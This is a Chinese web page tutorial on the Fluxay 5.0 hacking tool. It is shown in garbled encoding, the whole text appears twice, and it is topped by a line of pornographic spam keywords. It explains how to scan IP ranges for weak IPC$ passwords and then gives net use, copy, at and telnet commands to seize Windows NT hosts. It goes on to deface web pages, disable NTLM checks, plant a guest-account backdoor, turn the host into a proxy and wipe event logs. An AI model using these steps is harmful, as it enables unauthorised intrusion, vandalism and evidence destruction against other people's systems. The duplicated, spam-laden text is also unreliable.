六月丁香五月婷婷,丁香五月婷婷网,欧美激情网站,日本护士xxxx,禁止18岁天天操夜夜操,18岁禁止1000免费,国产福利无码一区色费

學(xué)習(xí)啦 > 學(xué)習(xí)電腦 > 電腦安全 > 網(wǎng)絡(luò)安全知識(shí) > 流光5.0破解密碼教程

流光5.0破解密碼教程

時(shí)間: 權(quán)威724 分享

流光5.0破解密碼教程

  流光5.0的使用方法

  1:流光概述

  流光,這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專(zhuān)業(yè)的黑客,這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3,F(xiàn)TP,HTTP,PROXY,F(xiàn)ROM,SQL,SMTP,IPC,等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。

  2:流光使用:

  步驟1:打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)

  “文件”--}“高級(jí)掃描向?qū)?rdquo;

  --}在“起始”/“結(jié)束”位置填入,你要掃描的IP段。

  --}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。

  --}在“獲取主機(jī)名”、“PING檢查”前面打勾

  --}在“檢測(cè)項(xiàng)目”中選擇“全選”

  --}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

  說(shuō)明:“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。

  “自定義”可以自己定義進(jìn)行掃描。

  --}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”

  --}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。

  步驟2:?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。

  步驟3:查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告

  方法二:

  一、POP3/FTP/…探測(cè)

  二、IPC探測(cè)

  三、SQL探測(cè)

  四、高級(jí)掃描

  五、其它 …

  因?yàn)殚_(kāi)發(fā)時(shí)間的原因,上面的探測(cè)模式略有不同,所以分成了四個(gè)部分,本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了:)

  流光的IPC探測(cè):

  一、目的和任務(wù):

  1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限,并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。

  2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。

  二、探測(cè)流程:

  1、你得有流光,我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000,否則流光啟動(dòng)會(huì)失敗!

  什么是IPC:

  IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$,是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。

  IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,它的特點(diǎn)是在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。

  注意,你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。

  可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò),是不是太笨了點(diǎn) …

  2、首次啟動(dòng)流光,會(huì)看到注冊(cè)的畫(huà)面,具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板,那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。

  在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng),或者直接按Ctrl+R。

  3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機(jī)

  4、探測(cè)中……

  (注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段,會(huì)被禁止的,也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)

  有遠(yuǎn)程主機(jī)的管理密碼了,我們剩下的就是想辦法控制它了,有什么好辦么? :)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢,我以后在說(shuō),今天還是先練習(xí)net 命令吧。

  黑了他 !

  開(kāi)個(gè)dos prompt 執(zhí)行如下命令,本次用的例子如下圖。

  1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶(hù)名" || 建立遠(yuǎn)程連接

  2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 :) 這里文件多。

  3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間

  4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序,在這里我們用soon這個(gè)程序來(lái)做也可以,它可以取代 3/4兩步。

  5、 telnet 對(duì)方ip 端口 ||

  6、輸入pass (如果不是用icmd.exe,或者沒(méi)有設(shè)置口令就不用了) ||

  7、在開(kāi)個(gè)窗口,繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

  如果我們真的想黑了他,只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了,我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止,一般是在X:\interpub\wwwroot\ .

  假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot,這樣:copy default.htm \ip\c$\interpub\wwwroot

  下面的圖有演示

  8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的:(,我們最好是物有所有,作成跳板吧,今后干活方便點(diǎn):

  執(zhí)行我們copy 過(guò)去的ntlm.exe ,取消驗(yàn)正。在給自己留個(gè)后門(mén),比如提升guest的權(quán)限,或者其它的后門(mén)工具,這類(lèi)東西多了自己選吧,看看殺手copy的那堆東西 :)

  9、還能做成其他的么 ?

  當(dāng)然了,只要你有時(shí)間,并且愿意做,我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上,速度快、空間無(wú)限,嘿嘿 :)

  10、日志清除,斷開(kāi)連接 :

  執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在斷開(kāi)連接:net use \ip\ipc$ /delete

  流光簡(jiǎn)介

  流光4.7)一個(gè)絕好的ftp、pop3解密工具,界面豪華,功能強(qiáng)大!功能簡(jiǎn)介如下:1、用于檢測(cè)POP3/FTP主機(jī)中用戶(hù)密碼安全漏洞。2、163/169雙通。3、多線(xiàn)程檢測(cè),消除系統(tǒng)中密碼漏洞。4、高效的用戶(hù)流模式。5、高效服務(wù)器流模式,可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線(xiàn)程探測(cè)。7、線(xiàn)程超時(shí)設(shè)置,阻塞線(xiàn)程具有自殺功能,不會(huì)影響其他線(xiàn)程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。

  流光4.7新增功能:

  1、加入了本地模式,在本機(jī)運(yùn)行是不必安裝Sensor。

  2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

  3、后臺(tái)掃描模式時(shí),掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。

  4、Sensor的掃描速度加快。

  5、減少了Sensor異常退出的BUG。

  6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長(zhǎng)度最多可到192bits,保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

  7、修正的控制服務(wù),新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。

  8、Sensor的服務(wù)名稱(chēng)可以任意指定,控制服務(wù)和Sensor的進(jìn)程名稱(chēng)也可以任意指定。

  9、支持XP(本地模式),很快會(huì)有98/ME的版本。

  流光5.0的使用方法

  1:流光概述

  流光,這款工具可以讓一個(gè)只會(huì)點(diǎn)擊鼠標(biāo)的人成為專(zhuān)業(yè)的黑客,這樣說(shuō)一點(diǎn)也不夸張。它可以探測(cè)POP3,F(xiàn)TP,HTTP,PROXY,F(xiàn)ROM,SQL,SMTP,IPC,等各種漏洞。并針對(duì)個(gè)中漏洞設(shè)計(jì)不同的破解方案。

  2:流光使用:

  步驟1:打開(kāi)高級(jí)掃描向?qū)гO(shè)置掃描參數(shù)

  “文件”--}“高級(jí)掃描向?qū)?rdquo;

  --}在“起始”/“結(jié)束”位置填入,你要掃描的IP段。

  --}在“ 目標(biāo)系統(tǒng)”中選擇你要檢測(cè)的操作系統(tǒng)。

  --}在“獲取主機(jī)名”、“PING檢查”前面打勾

  --}在“檢測(cè)項(xiàng)目”中選擇“全選”

  --}然后單擊“下一步”選擇“標(biāo)準(zhǔn)端口掃描”

  說(shuō)明:“標(biāo)準(zhǔn)斷口”只對(duì)常見(jiàn)的斷口進(jìn)行掃描。

  “自定義”可以自己定義進(jìn)行掃描。

  --}然后單擊“下一步” 設(shè)置好所有檢測(cè)項(xiàng)目后點(diǎn)擊“下一步”

  --}在選擇主機(jī)界面選擇“本地主機(jī)”使用本地主機(jī)進(jìn)任務(wù)掃描。

  步驟2:?jiǎn)螕?ldquo;開(kāi)始”掃描過(guò)程中要想停止選擇“取消”不過(guò)要等一段時(shí)間。

  步驟3:查看掃描報(bào)告。掃描結(jié)束之后給出“HTLM”格式的報(bào)告

  方法二:

  一、POP3/FTP/…探測(cè)

  二、IPC探測(cè)

  三、SQL探測(cè)

  四、高級(jí)掃描

  五、其它 …

  因?yàn)殚_(kāi)發(fā)時(shí)間的原因,上面的探測(cè)模式略有不同,所以分成了四個(gè)部分,本教程說(shuō)的是第一個(gè)部分的探測(cè)。后面的探測(cè)模式應(yīng)該屬于流光的高級(jí)應(yīng)用了:)

  流光的IPC探測(cè):

  一、目的和任務(wù):

  1、用流光的IPC探測(cè)獲得一臺(tái)NT主機(jī)的管理權(quán)限,并將這臺(tái)主機(jī)做成一個(gè)跳板/代理。

  2、學(xué)習(xí)IPC探測(cè)的相關(guān)知識(shí)。

  二、探測(cè)流程:

  1、你得有流光,我這里試驗(yàn)用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因?yàn)镮PC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統(tǒng)得是NT/2000,否則流光啟動(dòng)會(huì)失敗!

  什么是IPC:

  IPC是指"InterProcess Communications",準(zhǔn)確的說(shuō)是ipc$,是默認(rèn)的在系統(tǒng)啟動(dòng)時(shí)的admin共享。

  IPC$是Windows NT/2K中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,它的特點(diǎn)是在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。

  注意,你試圖通過(guò)IPC$連接會(huì)在EventLog中留下記錄。不管你是否登錄成功。

  可不可以通過(guò)IPC$暴力破解密碼?當(dāng)然可以 ! 不過(guò),是不是太笨了點(diǎn) …

  2、首次啟動(dòng)流光,會(huì)看到注冊(cè)的畫(huà)面,具體操作請(qǐng)參考本人第一篇教程。我們?cè)谥黜?yè)面上可以有幾種方法來(lái)通過(guò)IPC 探測(cè)獲得管理的權(quán)限。這里我們要作的是得到一臺(tái)跳板,那么就可以用命中率高的辦法來(lái)探測(cè)了(測(cè)試一堆IP來(lái)得到弱口令)。

  在主界面選擇 探測(cè)→探測(cè)POP3/FTP/NT/SQL主機(jī)選項(xiàng),或者直接按Ctrl+R。

  3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來(lái)看看。圖main2我們把“將FrontPage主機(jī)自動(dòng)加入HTTP主機(jī)列表取消了”。因?yàn)槲覀冎幌氆@得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機(jī)

  4、探測(cè)中……

  (注意如果你要探測(cè)的是流光保留的國(guó)內(nèi)的IP段,會(huì)被禁止的,也就是探測(cè)的時(shí)候信息欄出現(xiàn)"IP保留"的字樣)

  有遠(yuǎn)程主機(jī)的管理密碼了,我們剩下的就是想辦法控制它了,有什么好辦么? :)有的是 !自己看看工具-菜單下的IIS遠(yuǎn)程命令:)是不是很簡(jiǎn)單呢,我以后在說(shuō),今天還是先練習(xí)net 命令吧。

  黑了他 !

  開(kāi)個(gè)dos prompt 執(zhí)行如下命令,本次用的例子如下圖。

  1、 net use \對(duì)方ip\ipc$ "密碼" /user:"用戶(hù)名" || 建立遠(yuǎn)程連接

  2、 copy icmd.exe \對(duì)方ip\admin$ || admin$是對(duì)方的winnt目錄 :) 這里文件多。

  3、 net time \對(duì)方IP || 看看對(duì)方的本地時(shí)間

  4、at \對(duì)方ip 啟動(dòng)程序的時(shí)間 啟動(dòng)程序名 啟動(dòng)程序的參數(shù) || 用at命令來(lái)定時(shí)啟動(dòng)程序,在這里我們用soon這個(gè)程序來(lái)做也可以,它可以取代 3/4兩步。

  5、 telnet 對(duì)方ip 端口 ||

  6、輸入pass (如果不是用icmd.exe,或者沒(méi)有設(shè)置口令就不用了) ||

  7、在開(kāi)個(gè)窗口,繼續(xù)copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

  如果我們真的想黑了他,只需要把我們的首頁(yè)文件覆蓋目標(biāo)的首頁(yè)就ok了,我們可以通過(guò)dir /s default.htm或者dir /s index.htm 來(lái)確定對(duì)方首頁(yè)的為止,一般是在X:\interpub\wwwroot\ .

  假如首頁(yè)文件是default.htm并且在c:\interpub\wwwroot,這樣:copy default.htm \ip\c$\interpub\wwwroot

  下面的圖有演示

  8、其實(shí)黑人家是很低級(jí)并且沒(méi)意思的:(,我們最好是物有所有,作成跳板吧,今后干活方便點(diǎn):

  執(zhí)行我們copy 過(guò)去的ntlm.exe ,取消驗(yàn)正。在給自己留個(gè)后門(mén),比如提升guest的權(quán)限,或者其它的后門(mén)工具,這類(lèi)東西多了自己選吧,看看殺手copy的那堆東西 :)

  9、還能做成其他的么 ?

  當(dāng)然了,只要你有時(shí)間,并且愿意做,我曾經(jīng)偷偷的把自己的主頁(yè)放到人家的server上,速度快、空間無(wú)限,嘿嘿 :)

  10、日志清除,斷開(kāi)連接 :

  執(zhí)行我們copy 過(guò)去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在斷開(kāi)連接:net use \ip\ipc$ /delete

  流光簡(jiǎn)介

  流光4.7)一個(gè)絕好的ftp、pop3解密工具,界面豪華,功能強(qiáng)大!功能簡(jiǎn)介如下:1、用于檢測(cè)POP3/FTP主機(jī)中用戶(hù)密碼安全漏洞。2、163/169雙通。3、多線(xiàn)程檢測(cè),消除系統(tǒng)中密碼漏洞。4、高效的用戶(hù)流模式。5、高效服務(wù)器流模式,可同時(shí)對(duì)多臺(tái)POP3/FTP主機(jī)進(jìn)行檢測(cè)。6、最多500個(gè)線(xiàn)程探測(cè)。7、線(xiàn)程超時(shí)設(shè)置,阻塞線(xiàn)程具有自殺功能,不會(huì)影響其他線(xiàn)程。8、支持10個(gè)字典同時(shí)檢測(cè)。9、檢測(cè)設(shè)置可作為項(xiàng)目保存。10、取消了國(guó)內(nèi)IP限制而且免費(fèi)。

  流光4.7新增功能:

  1、加入了本地模式,在本機(jī)運(yùn)行是不必安裝Sensor。

  2、Sensor掃描臨時(shí)結(jié)果文件(*.PTR)的尺寸大約減少了10倍。

  3、后臺(tái)掃描模式時(shí),掃描的結(jié)果(*.PTR)可以直接通過(guò)附件發(fā)送到信箱。

  4、Sensor的掃描速度加快。

  5、減少了Sensor異常退出的BUG。

  6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長(zhǎng)度最多可到192bits,保證整個(gè)傳輸過(guò)程不可監(jiān)聽(tīng)。掃描的結(jié)果也只有在密鑰正確的情況下才可閱讀。

  7、修正的控制服務(wù),新的控制服務(wù)在升級(jí)Sensor時(shí)不再會(huì)失敗。

  8、Sensor的服務(wù)名稱(chēng)可以任意指定,控制服務(wù)和Sensor的進(jìn)程名稱(chēng)也可以任意指定。

  9、支持XP(本地模式),很快會(huì)有98/ME的版本。

510037